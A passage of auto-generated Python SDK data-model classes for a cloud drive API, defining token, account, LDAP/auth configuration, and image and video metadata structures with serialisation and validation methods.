body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class RegisterModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class MobileSendSmsCodeResponse(TeaModel):
"""
*\
"""
def __init__(
self,
sms_code_id: str = None,
):
# 短信验证码ID
self.sms_code_id = sms_code_id
def validate(self):
self.validate_required(self.sms_code_id, 'sms_code_id')
def to_map(self):
result = dict()
if self.sms_code_id is not None:
result['sms_code_id'] = self.sms_code_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('sms_code_id') is not None:
self.sms_code_id = m.get('sms_code_id')
return self
class MobileSendSmsCodeModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: MobileSendSmsCodeResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = MobileSendSmsCodeResponse()
self.body = temp_model.from_map(m['body'])
return self
class AccountRevokeModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class AccountTokenModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: AccountAccessTokenResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = AccountAccessTokenResponse()
self.body = temp_model.from_map(m['body'])
return self
class AccessTokenResponse(TeaModel):
"""
*\
"""
def __init__(
self,
access_token: str = None,
default_drive_id: str = None,
expire_time: str = None,
expires_in: int = None,
refresh_token: str = None,
role: str = None,
token_type: str = None,
user_id: str = None,
):
# 用于调用业务接口的accessToken
self.access_token = access_token
# Default Drive ID
self.default_drive_id = default_drive_id
# accessToken过期时间,ISO时间
self.expire_time = expire_time
# accessToken过期时间,单位秒
self.expires_in = expires_in
# 用于刷新accessToken
self.refresh_token = refresh_token
# 当前用户角色
self.role = role
# accessToken类型,Bearer
self.token_type = token_type
# 当前用户ID
self.user_id = user_id
def validate(self):
self.validate_required(self.access_token, 'access_token')
self.validate_required(self.default_drive_id, 'default_drive_id')
self.validate_required(self.expire_time, 'expire_time')
self.validate_required(self.expires_in, 'expires_in')
self.validate_required(self.refresh_token, 'refresh_token')
self.validate_required(self.role, 'role')
self.validate_required(self.token_type, 'token_type')
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.access_token is not None:
result['access_token'] = self.access_token
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.expire_time is not None:
result['expire_time'] = self.expire_time
if self.expires_in is not None:
result['expires_in'] = self.expires_in
if self.refresh_token is not None:
result['refresh_token'] = self.refresh_token
if self.role is not None:
result['role'] = self.role
if self.token_type is not None:
result['token_type'] = self.token_type
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('access_token') is not None:
self.access_token = m.get('access_token')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('expire_time') is not None:
self.expire_time = m.get('expire_time')
if m.get('expires_in') is not None:
self.expires_in = m.get('expires_in')
if m.get('refresh_token') is not None:
self.refresh_token = m.get('refresh_token')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('token_type') is not None:
self.token_type = m.get('token_type')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class AccountLinkRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
detail: str = None,
extra: str = None,
identity: str = None,
status: str = None,
type: str = None,
user_id: str = None,
):
self.headers = headers
# 账号信息
self.detail = detail
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
# 唯一身份标识
self.identity = identity
# 状态
self.status = status
# 认证类型
self.type = type
# 绑定的user_id
self.user_id = user_id
def validate(self):
self.validate_required(self.identity, 'identity')
self.validate_required(self.type, 'type')
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.detail is not None:
result['detail'] = self.detail
if self.extra is not None:
result['extra'] = self.extra
if self.identity is not None:
result['identity'] = self.identity
if self.status is not None:
result['status'] = self.status
if self.type is not None:
result['type'] = self.type
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('detail') is not None:
self.detail = m.get('detail')
if m.get('extra') is not None:
self.extra = m.get('extra')
if m.get('identity') is not None:
self.identity = m.get('identity')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class AccountTokenRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
addition_data: dict = None,
app_id: str = None,
grant_type: str = None,
refresh_token: str = None,
):
self.headers = headers
# addition_data
self.addition_data = addition_data
# App ID, 当前访问的App
self.app_id = app_id
# 只能填refresh_token
self.grant_type = grant_type
# refresh token, 登录时返回的
self.refresh_token = refresh_token
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.grant_type, 'grant_type')
self.validate_required(self.refresh_token, 'refresh_token')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.addition_data is not None:
result['addition_data'] = self.addition_data
if self.app_id is not None:
result['app_id'] = self.app_id
if self.grant_type is not None:
result['grant_type'] = self.grant_type
if self.refresh_token is not None:
result['refresh_token'] = self.refresh_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('addition_data') is not None:
self.addition_data = m.get('addition_data')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('grant_type') is not None:
self.grant_type = m.get('grant_type')
if m.get('refresh_token') is not None:
self.refresh_token = m.get('refresh_token')
return self
class AddStoreRequest(TeaModel):
"""
*\
"""
def __init__(
self,
base_path: str = None,
bucket: str = None,
domain_id: str = None,
endpoint: str = None,
ownership: str = None,
role_arn: str = None,
type: str = None,
):
# 存储公共前缀
self.base_path = base_path
# bucket名称
self.bucket = bucket
# domain ID
self.domain_id = domain_id
# 存储访问地址
self.endpoint = endpoint
# 存储归属,system表示系统提供,custom表示使用自己的存储
self.ownership = ownership
# 访问Bucket的角色ARN
self.role_arn = role_arn
# 存储类型,当前只支持oss
self.type = type
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.endpoint, 'endpoint')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.base_path is not None:
result['base_path'] = self.base_path
if self.bucket is not None:
result['bucket'] = self.bucket
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.ownership is not None:
result['ownership'] = self.ownership
if self.role_arn is not None:
result['role_arn'] = self.role_arn
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('base_path') is not None:
self.base_path = m.get('base_path')
if m.get('bucket') is not None:
self.bucket = m.get('bucket')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('ownership') is not None:
self.ownership = m.get('ownership')
if m.get('role_arn') is not None:
self.role_arn = m.get('role_arn')
if m.get('type') is not None:
self.type = m.get('type')
return self
class AppAccessStrategy(TeaModel):
"""
*\
"""
def __init__(
self,
effect: str = None,
except_app_id_list: List[str] = None,
):
self.effect = effect
self.except_app_id_list = except_app_id_list
def validate(self):
pass
def to_map(self):
result = dict()
if self.effect is not None:
result['effect'] = self.effect
if self.except_app_id_list is not None:
result['except_app_id_list'] = self.except_app_id_list
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('effect') is not None:
self.effect = m.get('effect')
if m.get('except_app_id_list') is not None:
self.except_app_id_list = m.get('except_app_id_list')
return self
class LdapConfig(TeaModel):
"""
*\
"""
def __init__(
self,
admin_dn: str = None,
admin_password: str = None,
base_dn: str = None,
host: str = None,
port: int = None,
uid: str = None,
):
self.admin_dn = admin_dn
self.admin_password = admin_password
self.base_dn = base_dn
self.host = host
self.port = port
self.uid = uid
def validate(self):
pass
def to_map(self):
result = dict()
if self.admin_dn is not None:
result['admin_dn'] = self.admin_dn
if self.admin_password is not None:
result['admin_password'] = self.admin_password
if self.base_dn is not None:
result['base_dn'] = self.base_dn
if self.host is not None:
result['host'] = self.host
if self.port is not None:
result['port'] = self.port
if self.uid is not None:
result['uid'] = self.uid
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('admin_dn') is not None:
self.admin_dn = m.get('admin_dn')
if m.get('admin_password') is not None:
self.admin_password = m.get('admin_password')
if m.get('base_dn') is not None:
self.base_dn = m.get('base_dn')
if m.get('host') is not None:
self.host = m.get('host')
if m.get('port') is not None:
self.port = m.get('port')
if m.get('uid') is not None:
self.uid = m.get('uid')
return self
class AuthConfig(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
app_secret: str = None,
callback_security: bool = None,
enable: bool = None,
endpoint: str = None,
enterprise_id: str = None,
ldap_config: LdapConfig = None,
login_page_headers: dict = None,
login_page_template: str = None,
login_page_vars: dict = None,
white_list_config: dict = None,
white_list_enable: bool = None,
):
self.app_id = app_id
self.app_secret = app_secret
self.callback_security = callback_security
self.enable = enable
self.endpoint = endpoint
self.enterprise_id = enterprise_id
self.ldap_config = ldap_config
self.login_page_headers = login_page_headers
self.login_page_template = login_page_template
self.login_page_vars = login_page_vars
self.white_list_config = white_list_config
self.white_list_enable = white_list_enable
def validate(self):
if self.ldap_config:
self.ldap_config.validate()
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
if self.app_secret is not None:
result['app_secret'] = self.app_secret
if self.callback_security is not None:
result['callback_security'] = self.callback_security
if self.enable is not None:
result['enable'] = self.enable
if self.endpoint is not None:
result['endpoint'] = self.endpoint
if self.enterprise_id is not None:
result['enterprise_id'] = self.enterprise_id
if self.ldap_config is not None:
result['ldap_config'] = self.ldap_config.to_map()
if self.login_page_headers is not None:
result['login_page_headers'] = self.login_page_headers
if self.login_page_template is not None:
result['login_page_template'] = self.login_page_template
if self.login_page_vars is not None:
result['login_page_vars'] = self.login_page_vars
if self.white_list_config is not None:
result['white_list_config'] = self.white_list_config
if self.white_list_enable is not None:
result['white_list_enable'] = self.white_list_enable
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('app_secret') is not None:
self.app_secret = m.get('app_secret')
if m.get('callback_security') is not None:
self.callback_security = m.get('callback_security')
if m.get('enable') is not None:
self.enable = m.get('enable')
if m.get('endpoint') is not None:
self.endpoint = m.get('endpoint')
if m.get('enterprise_id') is not None:
self.enterprise_id = m.get('enterprise_id')
if m.get('ldap_config') is not None:
temp_model = LdapConfig()
self.ldap_config = temp_model.from_map(m['ldap_config'])
if m.get('login_page_headers') is not None:
self.login_page_headers = m.get('login_page_headers')
if m.get('login_page_template') is not None:
self.login_page_template = m.get('login_page_template')
if m.get('login_page_vars') is not None:
self.login_page_vars = m.get('login_page_vars')
if m.get('white_list_config') is not None:
self.white_list_config = m.get('white_list_config')
if m.get('white_list_enable') is not None:
self.white_list_enable = m.get('white_list_enable')
return self
class AuthorizeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
client_id: str = None,
login_type: str = None,
redirect_uri: str = None,
response_type: str = None,
scope: List[str] = None,
state: str = None,
user_code: str = None,
):
# Client ID, 此处填写创建App时返回的AppID
self.client_id = client_id
# 鉴权方式,目前支持ding,ram鉴权
self.login_type = login_type
# 回调地址, 此处填写创建App时填写的回调地址
self.redirect_uri = redirect_uri
# 返回类型, 只能填写code
self.response_type = response_type
# 申请的权限列表, 默认为所有权限
self.scope = scope
# 用户自定义字段,会在鉴权成功后的callback带回
self.state = state
# 内部使用
self.user_code = user_code
def validate(self):
self.validate_required(self.client_id, 'client_id')
self.validate_required(self.redirect_uri, 'redirect_uri')
self.validate_required(self.response_type, 'response_type')
def to_map(self):
result = dict()
if self.client_id is not None:
result['ClientID'] = self.client_id
if self.login_type is not None:
result['LoginType'] = self.login_type
if self.redirect_uri is not None:
result['RedirectUri'] = self.redirect_uri
if self.response_type is not None:
result['ResponseType'] = self.response_type
if self.scope is not None:
result['Scope'] = self.scope
if self.state is not None:
result['State'] = self.state
if self.user_code is not None:
result['UserCode'] = self.user_code
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('ClientID') is not None:
self.client_id = m.get('ClientID')
if m.get('LoginType') is not None:
self.login_type = m.get('LoginType')
if m.get('RedirectUri') is not None:
self.redirect_uri = m.get('RedirectUri')
if m.get('ResponseType') is not None:
self.response_type = m.get('ResponseType')
if m.get('Scope') is not None:
self.scope = m.get('Scope')
if m.get('State') is not None:
self.state = m.get('State')
if m.get('UserCode') is not None:
self.user_code = m.get('UserCode')
return self
class CroppingBoundary(TeaModel):
"""
*\
"""
def __init__(
self,
height: int = None,
left: int = None,
top: int = None,
width: int = None,
):
self.height = height
self.left = left
self.top = top
self.width = width
def validate(self):
pass
def to_map(self):
result = dict()
if self.height is not None:
result['height'] = self.height
if self.left is not None:
result['left'] = self.left
if self.top is not None:
result['top'] = self.top
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('height') is not None:
self.height = m.get('height')
if m.get('left') is not None:
self.left = m.get('left')
if m.get('top') is not None:
self.top = m.get('top')
if m.get('width') is not None:
self.width = m.get('width')
return self
class CroppingSuggestionItem(TeaModel):
"""
*\
"""
def __init__(
self,
aspect_ratio: str = None,
cropping_boundary: CroppingBoundary = None,
score: float = None,
):
self.aspect_ratio = aspect_ratio
self.cropping_boundary = cropping_boundary
self.score = score
def validate(self):
if self.cropping_boundary:
self.cropping_boundary.validate()
def to_map(self):
result = dict()
if self.aspect_ratio is not None:
result['aspect_ratio'] = self.aspect_ratio
if self.cropping_boundary is not None:
result['cropping_boundary'] = self.cropping_boundary.to_map()
if self.score is not None:
result['score'] = self.score
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('aspect_ratio') is not None:
self.aspect_ratio = m.get('aspect_ratio')
if m.get('cropping_boundary') is not None:
temp_model = CroppingBoundary()
self.cropping_boundary = temp_model.from_map(m['cropping_boundary'])
if m.get('score') is not None:
self.score = m.get('score')
return self
class ImageQuality(TeaModel):
"""
*\
"""
def __init__(
self,
clarity: float = None,
clarity_score: float = None,
color: float = None,
color_score: float = None,
composition_score: float = None,
contrast: float = None,
contrast_score: float = None,
exposure: float = None,
exposure_score: float = None,
overall_score: float = None,
):
self.clarity = clarity
self.clarity_score = clarity_score
self.color = color
self.color_score = color_score
self.composition_score = composition_score
self.contrast = contrast
self.contrast_score = contrast_score
self.exposure = exposure
self.exposure_score = exposure_score
self.overall_score = overall_score
def validate(self):
pass
def to_map(self):
result = dict()
if self.clarity is not None:
result['clarity'] = self.clarity
if self.clarity_score is not None:
result['clarity_score'] = self.clarity_score
if self.color is not None:
result['color'] = self.color
if self.color_score is not None:
result['color_score'] = self.color_score
if self.composition_score is not None:
result['composition_score'] = self.composition_score
if self.contrast is not None:
result['contrast'] = self.contrast
if self.contrast_score is not None:
result['contrast_score'] = self.contrast_score
if self.exposure is not None:
result['exposure'] = self.exposure
if self.exposure_score is not None:
result['exposure_score'] = self.exposure_score
if self.overall_score is not None:
result['overall_score'] = self.overall_score
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('clarity') is not None:
self.clarity = m.get('clarity')
if m.get('clarity_score') is not None:
self.clarity_score = m.get('clarity_score')
if m.get('color') is not None:
self.color = m.get('color')
if m.get('color_score') is not None:
self.color_score = m.get('color_score')
if m.get('composition_score') is not None:
self.composition_score = m.get('composition_score')
if m.get('contrast') is not None:
self.contrast = m.get('contrast')
if m.get('contrast_score') is not None:
self.contrast_score = m.get('contrast_score')
if m.get('exposure') is not None:
self.exposure = m.get('exposure')
if m.get('exposure_score') is not None:
self.exposure_score = m.get('exposure_score')
if m.get('overall_score') is not None:
self.overall_score = m.get('overall_score')
return self
class SystemTag(TeaModel):
"""
*\
"""
def __init__(
self,
confidence: float = None,
en_name: str = None,
name: str = None,
parent_en_name: str = None,
parent_name: str = None,
selected: bool = None,
source: str = None,
tag_level: int = None,
):
self.confidence = confidence
self.en_name = en_name
self.name = name
self.parent_en_name = parent_en_name
self.parent_name = parent_name
self.selected = selected
self.source = source
self.tag_level = tag_level
def validate(self):
pass
def to_map(self):
result = dict()
if self.confidence is not None:
result['confidence'] = self.confidence
if self.en_name is not None:
result['en_name'] = self.en_name
if self.name is not None:
result['name'] = self.name
if self.parent_en_name is not None:
result['parent_en_name'] = self.parent_en_name
if self.parent_name is not None:
result['parent_name'] = self.parent_name
if self.selected is not None:
result['selected'] = self.selected
if self.source is not None:
result['source'] = self.source
if self.tag_level is not None:
result['tag_level'] = self.tag_level
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('confidence') is not None:
self.confidence = m.get('confidence')
if m.get('en_name') is not None:
self.en_name = m.get('en_name')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_en_name') is not None:
self.parent_en_name = m.get('parent_en_name')
if m.get('parent_name') is not None:
self.parent_name = m.get('parent_name')
if m.get('selected') is not None:
self.selected = m.get('selected')
if m.get('source') is not None:
self.source = m.get('source')
if m.get('tag_level') is not None:
self.tag_level = m.get('tag_level')
return self
class ImageMediaResponse(TeaModel):
"""
*\
"""
def __init__(
self,
address_line: str = None,
city: str = None,
country: str = None,
cropping_suggestion: List[CroppingSuggestionItem] = None,
district: str = None,
exif: str = None,
faces: str = None,
height: int = None,
image_quality: ImageQuality = None,
image_tags: List[SystemTag] = None,
location: str = None,
province: str = None,
story_image_score: float = None,
time: str = None,
township: str = None,
width: int = None,
):
# address_line
self.address_line = address_line
# city
self.city = city
# country
self.country = country
# cropping_suggestion
self.cropping_suggestion = cropping_suggestion
# district
self.district = district
# exif json string
self.exif = exif
# faces json string
self.faces = faces
# height
self.height = height
self.image_quality = image_quality
# system_tags
self.image_tags = image_tags
# location
self.location = location
# province
self.province = province
# story_image_score
self.story_image_score = story_image_score
# time
self.time = time
# township
self.township = township
# width
self.width = width
def validate(self):
if self.cropping_suggestion:
for k in self.cropping_suggestion:
if k:
k.validate()
if self.image_quality:
self.image_quality.validate()
if self.image_tags:
for k in self.image_tags:
if k:
k.validate()
def to_map(self):
result = dict()
if self.address_line is not None:
result['address_line'] = self.address_line
if self.city is not None:
result['city'] = self.city
if self.country is not None:
result['country'] = self.country
result['cropping_suggestion'] = []
if self.cropping_suggestion is not None:
for k in self.cropping_suggestion:
result['cropping_suggestion'].append(k.to_map() if k else None)
if self.district is not None:
result['district'] = self.district
if self.exif is not None:
result['exif'] = self.exif
if self.faces is not None:
result['faces'] = self.faces
if self.height is not None:
result['height'] = self.height
if self.image_quality is not None:
result['image_quality'] = self.image_quality.to_map()
result['image_tags'] = []
if self.image_tags is not None:
for k in self.image_tags:
result['image_tags'].append(k.to_map() if k else None)
if self.location is not None:
result['location'] = self.location
if self.province is not None:
result['province'] = self.province
if self.story_image_score is not None:
result['story_image_score'] = self.story_image_score
if self.time is not None:
result['time'] = self.time
if self.township is not None:
result['township'] = self.township
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('address_line') is not None:
self.address_line = m.get('address_line')
if m.get('city') is not None:
self.city = m.get('city')
if m.get('country') is not None:
self.country = m.get('country')
self.cropping_suggestion = []
if m.get('cropping_suggestion') is not None:
for k in m.get('cropping_suggestion'):
temp_model = CroppingSuggestionItem()
self.cropping_suggestion.append(temp_model.from_map(k))
if m.get('district') is not None:
self.district = m.get('district')
if m.get('exif') is not None:
self.exif = m.get('exif')
if m.get('faces') is not None:
self.faces = m.get('faces')
if m.get('height') is not None:
self.height = m.get('height')
if m.get('image_quality') is not None:
temp_model = ImageQuality()
self.image_quality = temp_model.from_map(m['image_quality'])
self.image_tags = []
if m.get('image_tags') is not None:
for k in m.get('image_tags'):
temp_model = SystemTag()
self.image_tags.append(temp_model.from_map(k))
if m.get('location') is not None:
self.location = m.get('location')
if m.get('province') is not None:
self.province = m.get('province')
if m.get('story_image_score') is not None:
self.story_image_score = m.get('story_image_score')
if m.get('time') is not None:
self.time = m.get('time')
if m.get('township') is not None:
self.township = m.get('township')
if m.get('width') is not None:
self.width = m.get('width')
return self
class VideoMediaAudioStream(TeaModel):
"""
*\
"""
def __init__(
self,
bit_rate: str = None,
channel_layout: str = None,
channels: int = None,
code_name: str = None,
duration: str = None,
sample_rate: str = None,
):
# bit_rate 音频比特率 单位:bps
self.bit_rate = bit_rate
# channel_layout 声道布局
self.channel_layout = channel_layout
# channels 音频数/声道数
self.channels = channels
# code_name 音频编码模式
self.code_name = code_name
# duration 单位 秒
self.duration = duration
# sample_rate 音频采样率
self.sample_rate = sample_rate
def validate(self):
pass
def to_map(self):
result = dict()
if self.bit_rate is not None:
result['bit_rate'] = self.bit_rate
if self.channel_layout is not None:
result['channel_layout'] = self.channel_layout
if self.channels is not None:
result['channels'] = self.channels
if self.code_name is not None:
result['code_name'] = self.code_name
if self.duration is not None:
result['duration'] = self.duration
if self.sample_rate is not None:
result['sample_rate'] = self.sample_rate
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('bit_rate') is not None:
self.bit_rate = m.get('bit_rate')
if m.get('channel_layout') is not None:
self.channel_layout = m.get('channel_layout')
if m.get('channels') is not None:
self.channels = m.get('channels')
if m.get('code_name') is not None:
self.code_name = m.get('code_name')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('sample_rate') is not None:
self.sample_rate = m.get('sample_rate')
return self
class VideoMediaVideoStream(TeaModel):
"""
*\
"""
def __init__(
self,
bitrate: str = None,
clarity: str = None,
code_name: str = None,
duration: str = None,
fps: str = None,
rotate: str = None,
):
# bitrate 视频比特率 单位:bps
self.bitrate = bitrate
# clarity 清晰度(扫描)
self.clarity = clarity
# code_name 视频编码模式
self.code_name = code_name
# duration 单位 秒
self.duration = duration
# fps 视频平均帧率
self.fps = fps
# rotate 视频横屏 竖屏
self.rotate = rotate
def validate(self):
pass
def to_map(self):
result = dict()
if self.bitrate is not None:
result['bitrate'] = self.bitrate
if self.clarity is not None:
result['clarity'] = self.clarity
if self.code_name is not None:
result['code_name'] = self.code_name
if self.duration is not None:
result['duration'] = self.duration
if self.fps is not None:
result['fps'] = self.fps
if self.rotate is not None:
result['rotate'] = self.rotate
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('bitrate') is not None:
self.bitrate = m.get('bitrate')
if m.get('clarity') is not None:
self.clarity = m.get('clarity')
if m.get('code_name') is not None:
self.code_name = m.get('code_name')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('fps') is not None:
self.fps = m.get('fps')
if m.get('rotate') is not None:
self.rotate = m.get('rotate')
return self
class VideoMediaResponse(TeaModel):
"""
*\
"""
def __init__(
self,
address_line: str = None,
city: str = None,
country: str = None,
district: str = None,
duration: str = None,
height: int = None,
image_tags: List[SystemTag] = None,
location: str = None,
province: str = None,
time: str = None,
township: str = None,
video_media_audio_stream: List[VideoMediaAudioStream] = None,
video_media_video_stream: List[VideoMediaVideoStream] = None,
width: int = None,
):
# address_line
self.address_line = address_line
# city
self.city = city
# country
self.country = country
# district
self.district = district
# duration 单位 秒
self.duration = duration
# height
self.height = height
# system_tags
self.image_tags = image_tags
# location
self.location = location
# province
self.province = province
# time
self.time = time
# township
self.township = township
self.video_media_audio_stream = video_media_audio_stream
self.video_media_video_stream = video_media_video_stream
# width
self.width = width
def validate(self):
if self.image_tags:
for k in self.image_tags:
if k:
k.validate()
if self.video_media_audio_stream:
for k in self.video_media_audio_stream:
if k:
k.validate()
if self.video_media_video_stream:
for k in self.video_media_video_stream:
if k:
k.validate()
def to_map(self):
result = dict()
if self.address_line is not None:
result['address_line'] = self.address_line
if self.city is not None:
result['city'] = self.city
if self.country is not None:
result['country'] = self.country
if self.district is not None:
result['district'] = self.district
if self.duration is not None:
result['duration'] = self.duration
if self.height is not None:
result['height'] = self.height
result['image_tags'] = []
if self.image_tags is not None:
for k in self.image_tags:
result['image_tags'].append(k.to_map() if k else None)
if self.location is not None:
result['location'] = self.location
if self.province is not None:
result['province'] = self.province
if self.time is not None:
result['time'] = self.time
if self.township is not None:
result['township'] = self.township
result['video_media_audio_stream'] = []
if self.video_media_audio_stream is not None:
for k in self.video_media_audio_stream:
result['video_media_audio_stream'].append(k.to_map() if k else None)
result['video_media_video_stream'] = []
if self.video_media_video_stream is not None:
for k in self.video_media_video_stream:
result['video_media_video_stream'].append(k.to_map() if k else None)
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('address_line') is not None:
self.address_line = m.get('address_line')
if m.get('city') is not None:
self.city = m.get('city')
if m.get('country') is not None:
self.country = m.get('country')
if m.get('district') is not None:
self.district = m.get('district')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('height') is not None:
self.height = m.get('height')
self.image_tags = []
if m.get('image_tags') is not None:
for k in m.get('image_tags'):
temp_model = SystemTag()
self.image_tags.append(temp_model.from_map(k))
if m.get('location') is not None:
self.location = m.get('location')
if m.get('province') is not None:
self.province = m.get('province')
if m.get('time') is not None:
self.time = m.get('time')
if m.get('township') is not None:
self.township = m.get('township')
self.video_media_audio_stream = []
if m.get('video_media_audio_stream') is not None:
for k in m.get('video_media_audio_stream'):
temp_model = VideoMediaAudioStream()
self.video_media_audio_stream.append(temp_model.from_map(k))
self.video_media_video_stream = []
if m.get('video_media_video_stream') is not None:
for k in m.get('video_media_video_stream'):
temp_model = VideoMediaVideoStream()
self.video_media_video_stream.append(temp_model.from_map(k))
if m.get('width') is not None:
self.width = m.get('width')
return self
class VideoPreviewAudioMeta(TeaModel):
"""
*\
"""
def __init__(
self,
bitrate: float = None,
channels: int = None,
duration: float = None,
sample_rate: float = None,
):
# bitrate
self.bitrate = bitrate
# channels
self.channels = channels
# duration
self.duration = duration
# sample_rate
self.sample_rate = sample_rate
def validate(self):
pass
def to_map(self):
result = dict()
if self.bitrate is not None:
result['bitrate'] = self.bitrate
if self.channels is not None:
result['channels'] = self.channels
if self.duration is not None:
result['duration'] = self.duration
if self.sample_rate is not None:
result['sample_rate'] = self.sample_rate
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('bitrate') is not None:
self.bitrate = m.get('bitrate')
if m.get('channels') is not None:
self.channels = m.get('channels')
if m.get('duration') is not None:
self.duration = m.get('duration')
if m.get('sample_rate') is not None:
self.sample_rate = m.get('sample_rate')
return self
class VideoPreviewAudioMusicMeta(TeaModel):
"""
*\
"""
def __init__(
self,
album: str = None,
artist: str = None,
cover_url: str = None,
title: str = None,
):
# album
self.album = album
# artist
self.artist = artist
# cover_url
self.cover_url = cover_url
# title
self.title = title
def validate(self):
pass
def to_map(self):
result = dict()
if self.album is not None:
result['album'] = self.album
if self.artist is not None:
result['artist'] = self.artist
if self.cover_url is not None:
result['cover_url'] = self.cover_url
if self.title is not None:
result['title'] = self.title
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('album') is not None:
self.album = m.get('album')
if m.get('artist') is not None:
self.artist = m.get('artist')
if m.get('cover_url') is not None:
self.cover_url = m.get('cover_url')
if m.get('title') is not None:
self.title = m.get('title')
return self
class VideoPreviewTranscode(TeaModel):
"""
*\
"""
def __init__(
self,
status: str = None,
template_id: str = None,
):
# status
self.status = status
# template_id
self.template_id = template_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.status is not None:
result['status'] = self.status
if self.template_id is not None:
result['template_id'] = self.template_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('status') is not None:
self.status = m.get('status')
if m.get('template_id') is not None:
self.template_id = m.get('template_id')
return self
class VideoPreviewSprite(TeaModel):
"""
*\
"""
def __init__(
self,
col: int = None,
count: int = None,
frame_count: int = None,
frame_height: int = None,
frame_width: int = None,
row: int = None,
status: str = None,
):
# col
self.col = col
# count
self.count = count
# frame_count
self.frame_count = frame_count
# frame_height
self.frame_height = frame_height
# frame_width
self.frame_width = frame_width
# row
self.row = row
# status
self.status = status
def validate(self):
pass
def to_map(self):
result = dict()
